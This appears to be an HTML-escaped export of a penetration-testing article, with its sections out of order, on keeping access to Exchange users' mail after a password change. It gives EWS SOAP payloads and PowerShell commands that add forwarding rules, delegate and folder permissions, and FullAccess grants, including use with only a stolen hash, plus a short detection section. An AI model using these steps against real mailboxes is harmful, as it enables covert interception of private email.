xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code.\u003C\u002Fp>\u003Ch3>3. Implementation via PowerShell\u003C\u002Fh3>\u003Cp>Commands for managing mailboxes need to be executed on the Exchange server.\u003C\u002Fp>\u003Cp>First, you need to add the dependency package:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The management snap-in names vary for different Exchange versions:\u003C\u002Fp>\u003Cul>\u003Cli>Exchange 2007: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin;\u003C\u002Fli>\u003Cli>Exchange 2010: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010;\u003C\u002Fli>\u003Cli>Exchange 2013 &amp; 2016: Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fli>\u003C\u002Ful>\u003Cp>View the access permissions for user test2's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxFolderPermission -Identity test2@test.com:\\Inbox|fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Add read permission for user test2 to user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -AccessRights Owner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove user test2's read permission for user test1's inbox:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxFolderPermission -Identity test1@test.com:\\Inbox -User test2@test.com -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Method to Continuously Obtain Exchange User Inbox Emails by Adding Mail Functionality\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Add forwarding functionality via EAC\u003C\u002Fh3>\u003Cp>Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Frecipients\u002Fuser-mailboxes\u002Femail-forwarding?view=exchserver-2016\u003C\u002Fp>\u003Cp>Requires access to Exchange Admin Center (EAC), i.e., Exchange administrator permissions and access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in to ECP using Exchange administrator credentials\u003C\u002Fp>\u003Cp>Locate user test1 and edit, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017393631_4_dd4a22b5c5.jpeg\">\u003C\u002Fp>\u003Cp>Select Mailbox Features -&gt; Mail Flow -&gt; select View details\u003C\u002Fp>\u003Cp>Select Enable forwarding, add user, choose Deliver message to both forwarding address and mailbox, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017431017_5_9a43d63738.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the forwarding function setup is complete\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the message will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implement via Exchange Management Shell\u003C\u002Fh3>\u003Cp>Exchange Management Shell can be launched in the following three ways:\u003C\u002Fp>\u003Cp>(1) Run Exchange Management Shell directly on the Exchange Server\u003C\u002Fp>\u003Cp>(2) Start PowerShell on the Exchange Server and enter the command Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;\u003C\u002Fp>\u003Cp>(3) Connect to the Exchange server using PSSession\u003C\u002Fp>\u003Cp>For detailed methods, refer to the previous article 'Penetration Basics – Searching and Exporting Emails from Exchange Servers'\u003C\u002Fp>\u003Cp>The PowerShell command to add forwarding of emails from user test1's inbox to user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Set-Mailbox -Identity \"test1\" -ForwardingAddress \"test2\" -DeliverToMailboxAndForward $true\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If forwarding emails to an unverified external email address, replace ForwardingAddress with ForwardingSmtpAddress\u003C\u002Fp>\u003Ch2>0x05 Method to Add User Permissions for Persistent Access to Exchange User Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-mailboxpermission?view=exchange-ps\u003C\u002Fp>\u003Cp>The PowerShell command to add full access permissions for user test1 to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -InheritanceType All\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to view the mailbox access permissions for user test2 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-MailboxPermission -Identity test2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove user test1's full access permissions to user test2's mailbox is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-MailboxPermission -Identity \"test2\" -User \"test1\" -AccessRights FullAccess -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add-RecipientPermission can only be used in cloud-based services. Reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fpowershell\u002Fmodule\u002Fexchange\u002Fadd-recipientpermission?view=exchange-ps\u003C\u002Fp>\u003Ch2>0x06 Open Source Code\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In practical use, if only the hash of a mail user is available, it is not possible to add mail forwarding rules via OWA and ECP.\u003C\u002Fp>\u003Cp>However, we can first log in to EWS using the hash, then send SOAP messages through a program to achieve this.\u003C\u002Fp>\u003Cp>Here, using the previously open-source program ewsManage.py as a template, the following features have been added:\u003C\u002Fp>\u003Cul>\u003Cli>getdelegateofinbox\u003C\u002Fli>\u003Cli>adddelegateofinbox\u003C\u002Fli>\u003Cli>updatedelegateofinbox\u003C\u002Fli>\u003Cli>removedelegateofinbox\u003C\u002Fli>\u003Cli>getdelegateofsentitems\u003C\u002Fli>\u003Cli>updatedelegateofsentitems\u003C\u002Fli>\u003Cli>restoredelegateofsentitems\u003C\u002Fli>\u003Cli>getinboxrules\u003C\u002Fli>\u003Cli>updateinboxrules\u003C\u002Fli>\u003Cli>removeinboxrules\u003C\u002Fli>\u003C\u002Ful>\u003Cp>GitHub code has been updated, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch2>0x07 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. View forwarding rules for a single mail user\u003C\u002Fp>\u003Cp>Access Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in, view organize email -&gt; inbox rules\u003C\u002Fp>\u003Cp>2. View access permissions for a single mail user\u003C\u002Fp>\u003Cp>Access Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in, view Inbox-&gt;permissions...\u003C\u002Fp>\u003Cp>3. Check the inbox forwarding function for all mail users\u003C\u002Fp>\u003Cp>Run Exchange Management Shell, view the command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-Mailbox|Select-Object UserPrincipalName,ForwardingAddress,ForwardingSmtpAddress\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces four methods to continuously obtain Exchange user inbox emails, provides open-source implementation code via SOAP XML messages, supports usage under hash-only conditions, and offers defense recommendations combined with exploitation approaches.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When we obtain a user's password or hash, we can read that user's emails.\u003C\u002Fp>\u003Cp>If the user changes their password, can we continue to read that user's emails without knowing the new password?\u003C\u002Fp>\u003Cp>From a defensive perspective, when a mail user's password is leaked, what additional steps should we take after changing the password to ensure the security of email data?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding forwarding rules\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding access permissions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding mail functions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user emails by adding user permissions\u003C\u002Fli>\u003Cli>Open-source code\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to Continuously Obtain Exchange User Inbox Emails by Adding Forwarding Rules\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Adding forwarding rules via ECP\u003C\u002Fh3>\u003Cp>Requires access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in as user test1, select organize email -&gt; inbox rules, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017267123_0_d8247b6d3a-1.jpeg\">\u003C\u002Fp>\u003Cp>Select Create a new rule for arriving messages...\u003C\u002Fp>\u003Cp>Set Name as the rule name, here set to Forwardtest\u003C\u002Fp>\u003Cp>Configure sequentially as [Apply to all messages], Forward the message to..., select target user test2, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017290564_1_abd8302824-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the rule is successfully added\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the email will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implementation via SOAP XML message\u003C\u002Fh3>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdateinboxrules-operation\u003C\u002Fp>\u003Cp>Create and delete rules using UpdateInboxRules\u003C\u002Fp>\u003Cp>Format for creating a rule to forward emails to user test2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>      \u003Cm:operations>\u003Cbr>        \u003Ct:createruleoperation>\u003Cbr>          \u003Ct:rule>\u003Cbr>            \u003Ct:displayname>ForwardRule\u003C\u002Ft:displayname>\u003Cbr>            \u003Ct:priority>1\u003C\u002Ft:priority>\u003Cbr>            \u003Ct:isenabled>true\u003C\u002Ft:isenabled>\u003Cbr>            \u003Ct:conditions>\u003Cbr>            \u003Ct:exceptions>\u003Cbr>            \u003Ct:actions>\u003Cbr>              \u003Ct:forwardtorecipients>\u003Cbr>                \u003Ct:address>\u003Cbr>                  \u003Ct:emailaddress>test2@test.com\u003C\u002Ft:emailaddress>\u003Cbr>                \u003C\u002Ft:address>\u003Cbr>              \u003C\u002Ft:forwardtorecipients>\u003Cbr>            \u003C\u002Ft:actions>\u003Cbr>          \u003C\u002Ft:exceptions>\u003C\u002Ft:conditions>\u003C\u002Ft:rule>\u003Cbr>        \u003C\u002Ft:createruleoperation>\u003Cbr>      \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Reading rules uses GetInboxRules\u003C\u002Fp>\u003Cp>The format for reading rule information for user test1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getinboxrules>\u003Cbr>      \u003Cm:mailboxsmtpaddress>test1@test.com\u003C\u002Fm:mailboxsmtpaddress>\u003Cbr>    \u003C\u002Fm:getinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The RuleID corresponding to the rule can be obtained from the returned result.\u003C\u002Fp>\u003Cp>The format for deleting a specified rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>        \u003Cm:operations>\u003Cbr>          \u003Ct:deleteruleoperation>\u003Cbr>            \u003Ct:ruleid>AQAAAAAADPg\u003C\u002Ft:ruleid>\u003Cbr>          \u003C\u002Ft:deleteruleoperation>\u003Cbr>        \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>AQAAAAAADPg is the RuleId, which can be obtained via GetInboxRules\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code\u003C\u002Fp>\u003Ch2>0x03 Method to Add Access Permissions for Persistent Access to Exchange User Inbox Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Supports inbox, does not support outbox\u003C\u002Fp>\u003Ch3>1. Add inbox access permissions via OWA\u003C\u002Fh3>\u003Cp>Requires access to Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in as user test1, select Inbox -&gt; permissions..., as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017321998_2_0f92ae2b10-1.jpeg\">\u003C\u002Fp>\u003Cp>Add user test2 with edit permissions\u003C\u002Fp>\u003Cul>\u003Cli>Read: Full details\u003C\u002Fli>\u003Cli>Write: Edit all\u003C\u002Fli>\u003Cli>Delete access: None\u003C\u002Fli>\u003Cli>Other: Folder visible\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Alternatively, directly set the Permission level to Editor, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017371093_3_88aca0cc5b-1.jpeg\">\u003C\u002Fp>\u003Cp>At this point, permission setup is complete\u003C\u002Fp>\u003Cp>Log in as user test2, select add shared folder..., enter username test1 to obtain access to user test1's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes emails from the inbox, test2 cannot read the deleted emails\u003C\u002Fp>\u003Ch3>2. Implement via SOAP XML message\u003C\u002Fh3>\u003Cp>Add access permissions using AddDelegate or UpdateFolder\u003C\u002Fp>\u003Ch4>1. AddDelegate\u003C\u002Fh4>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fadddelegate-operation\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>AddDelegate supports the following folders:\u003C\u002Fp>\u003Cul>\u003Cli>CalendarFolderPermissionLevel\u003C\u002Fli>\u003Cli>TasksFolderPermissionLevel\u003C\u002Fli>\u003Cli>InboxFolderPermissionLevel\u003C\u002Fli>\u003Cli>ContactsFolderPermissionLevel\u003C\u002Fli>\u003Cli>NotesFolderPermissionLevel\u003C\u002Fli>\u003Cli>JournalFolderPermissionLevel\u003C\u002Fli>\u003C\u002Ful>\u003Cp>To view the access permissions for user test1's inbox, use the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getdelegate includepermissions=\"true\">\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>    \u003C\u002Fm:getdelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permissions to user test1's inbox, in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:adddelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>false\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:adddelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify access permissions using UpdateDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdatedelegate-operation\u003C\u002Fp>\u003Cp>Set full access permissions for user test2 to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        